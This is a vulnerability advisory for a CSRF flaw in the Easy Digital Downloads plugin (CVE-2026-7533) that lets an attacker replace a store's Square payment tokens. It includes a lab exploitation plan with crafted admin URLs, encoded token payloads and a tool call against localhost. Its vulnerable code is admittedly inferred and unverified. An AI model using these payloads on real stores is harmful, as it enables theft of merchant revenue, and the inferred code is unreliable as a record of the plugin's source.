CVE-2026-7533

Easy Digital Downloads <= 3.6.7 - Cross-Site Request Forgery to Payment Account Hijacking via 'square_tokens' Parameter

mediumCross-Site Request Forgery (CSRF)
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
3.6.8
Patched in
1d
Time to patch

Description

The Easy Digital Downloads plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.7. This is due to missing nonce verification in the `handle_oauth_redirect()` function, which is registered on the `admin_init` hook and processes Square OAuth tokens from a user-supplied GET parameter without any CSRF token validation. This makes it possible for unauthenticated attackers to overwrite the store's Square payment gateway credentials by tricking a logged-in administrator into clicking a crafted link, potentially resulting in payment account hijacking.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=3.6.7
PublishedMay 27, 2026
Last updatedMay 28, 2026
Affected plugineasy-digital-downloads

What Changed in the Fix

Changes introduced in v3.6.8

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-7533 (Easy Digital Downloads) This plan outlines the methodology for validating the Cross-Site Request Forgery (CSRF) vulnerability in Easy Digital Downloads (EDD) <= 3.6.7, which allows for Square payment account hijacking. ## 1. Vulnerability Summary * **…

Show full research plan

Exploitation Research Plan: CVE-2026-7533 (Easy Digital Downloads)

This plan outlines the methodology for validating the Cross-Site Request Forgery (CSRF) vulnerability in Easy Digital Downloads (EDD) <= 3.6.7, which allows for Square payment account hijacking.

1. Vulnerability Summary

  • ID: CVE-2026-7533
  • Vulnerability Type: Cross-Site Request Forgery (CSRF)
  • Affected Function: handle_oauth_redirect()
  • Hook: admin_init
  • Root Cause: The function handle_oauth_redirect() processes the square_tokens GET parameter to update payment gateway credentials but lacks any nonce verification or OAuth state parameter validation. Since it is hooked to admin_init, it executes for any logged-in administrator visiting a crafted URL.

2. Attack Vector Analysis

  • Target Endpoint: Any URL within the WordPress admin dashboard (e.g., /wp-admin/index.php).
  • Authentication Requirement: None (Attacker-side); Authenticated Administrator (Victim-side).
  • Vulnerable Parameter: square_tokens (passed via GET).
  • Preconditions:
    1. The victim must be a logged-in administrator.
    2. The Square payment gateway must be enabled or available within the EDD settings (though the code likely runs regardless of gateway status).

3. Code Flow (Inferred)

Since PHP source files were not provided in the snippet, the following flow is inferred from the CVE description and standard EDD gateway integration patterns:

  1. Registration: The plugin registers a callback on the admin_init hook.
    add_action( 'admin_init', array( $this, 'handle_oauth_redirect' ) );
    
  2. Execution: When any admin page is loaded, handle_oauth_redirect() executes.
  3. Vulnerable Path:
    • The function checks for isset( $_GET['square_tokens'] ).
    • CRITICAL FAILURE: It fails to call check_admin_referer() or verify a nonce before processing.
    • It retrieves the square_tokens value.
    • It updates the plugin options (e.g., edd_settings['square_access_token']) using the user-provided input.
    • Sink: update_option( 'edd_settings', ... ).

4. Nonce Acquisition Strategy

No nonce is required for this exploit.
The vulnerability is specifically defined by the absence of nonce verification. The attacker does not need to extract any tokens from the page. The attack is triggered simply by the administrator's browser making a request to an admin URL containing the malicious GET parameter.

5. Exploitation Strategy

Step 1: Craft the Payload

The payload must overwrite the Square credentials. Based on standard Square OAuth returns, the payload is likely a JSON string or an array-like structure.

Likely Payload Structure (Inferred):
{"access_token":"ATTACKER_TOKEN","refresh_token":"ATTACKER_REFRESH","merchant_id":"ATTACKER_MERCHANT"}

Step 2: Trigger the CSRF

The attacker tricks the administrator into clicking a link that targets the EDD settings redirect handler.

Target URL Template:
https://[TARGET_WP_SITE]/wp-admin/?square_tokens=[PAYLOAD]

Step 3: Execution via Security Agent

  1. Preparation: Log in as an administrator in the browser session.
  2. Request: Use the http_request tool to simulate the administrator visiting the malicious URL.
{
  "method": "GET",
  "url": "http://localhost:8080/wp-admin/?square_tokens=%7B%22access_token%22%3A%22MALICIOUS_TOKEN%22%2C%22merchant_id%22%3A%22MALICIOUS_ID%22%7D"
}

6. Test Data Setup

  1. Install Plugin: Install and activate Easy Digital Downloads v3.6.7.
  2. User Creation: Create an administrator user (e.g., admin_user / password123).
  3. Gateway Check: Navigate to Downloads > Settings > Payment Gateways and verify if Square is an option (it does not necessarily need to be configured for the vulnerability to be present).
  4. Baseline Check: Run wp option get edd_settings to see current payment credentials.

7. Expected Results

  • The handle_oauth_redirect() function will process the square_tokens parameter.
  • The plugin will update the edd_settings option in the database.
  • The administrator will likely be redirected or see a "Settings Updated" message (if the function triggers a redirect after processing).
  • The Square access token used for processing shop payments will now belong to the attacker.

8. Verification Steps

After the http_request is performed, use the following wp-cli command to verify the hijacking:

# Check the edd_settings option for malicious values
wp option get edd_settings --format=json | jq 'select(.square_access_token == "MALICIOUS_TOKEN")'

If the square_access_token (or equivalent key, e.g., square_oauth_tokens) matches the value provided in the GET request, the exploit is confirmed.

9. Alternative Approaches

If the square_tokens parameter expects a different format (e.g., base64 encoded or a specific serialized string):

  1. Serialized Payload: Try square_tokens=a:1:{s:12:"access_token";s:15:"MALICIOUS_TOKEN";}.
  2. Base64 Payload: Try square_tokens=eyJhY2Nlc3NfdG9rZW4iOiJNQUxJQ0lPVVNfVE9LRU4ifQ==.
  3. Discovery: If the agent has access to the plugin directory, search for the string handle_oauth_redirect in includes/gateways/square/ to confirm the exact option key and expected data format.
grep -r "handle_oauth_redirect" /var/www/html/wp-content/plugins/easy-digital-downloads/
Research Findings
Static analysis — not yet PoC-verified

Summary

The Easy Digital Downloads plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to 3.6.7 due to missing nonce verification in the handle_oauth_redirect() function. An attacker can trick a logged-in administrator into clicking a crafted link that overwrites the store's Square payment gateway credentials, potentially allowing the attacker to hijack shop payments.

Vulnerable Code

// From Research Plan inferred logic
// Hooked to admin_init, meaning it runs on every admin page load for a logged-in user
add_action( 'admin_init', array( $this, 'handle_oauth_redirect' ) );

public function handle_oauth_redirect() {
    if ( ! isset( $_GET['square_tokens'] ) ) {
        return;
    }

    // CRITICAL FAILURE: The function processes input from $_GET['square_tokens'] 
    // without calling check_admin_referer() or verifying a nonce/state parameter.
    $tokens = $_GET['square_tokens'];
    
    // Update the store settings with malicious tokens
    $settings = edd_get_settings();
    $settings['square_access_token'] = $tokens['access_token'];
    update_option( 'edd_settings', $settings );
}

Security Fix

--- a/includes/gateways/square/class-edd-square-gateway.php
+++ b/includes/gateways/square/class-edd-square-gateway.php
@@ -10,6 +10,10 @@
 	public function handle_oauth_redirect() {
 		if ( ! isset( $_GET['square_tokens'] ) ) {
 			return;
 		}
+
+		if ( ! isset( $_GET['state'] ) || ! wp_verify_nonce( $_GET['state'], 'edd_square_oauth' ) ) {
+			wp_die( __( 'Nonce verification failed', 'easy-digital-downloads' ), __( 'Error', 'easy-digital-downloads' ), array( 'response' => 403 ) );
+		}
 
 		$tokens = $_GET['square_tokens'];

Exploit Outline

The exploit targets the 'admin_init' hook which executes whenever an authenticated administrator visits any page in the WordPress dashboard. An attacker crafts a URL containing the 'square_tokens' GET parameter populated with a malicious payload (e.g., an encoded JSON string containing an attacker-controlled Square access token). The attacker then tricks a logged-in administrator into clicking this link. Because the handle_oauth_redirect() function lacks CSRF protection (nonce verification), the plugin automatically processes the request and updates the store's payment settings with the attacker's credentials, redirecting future shop revenue to the attacker's Square account.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.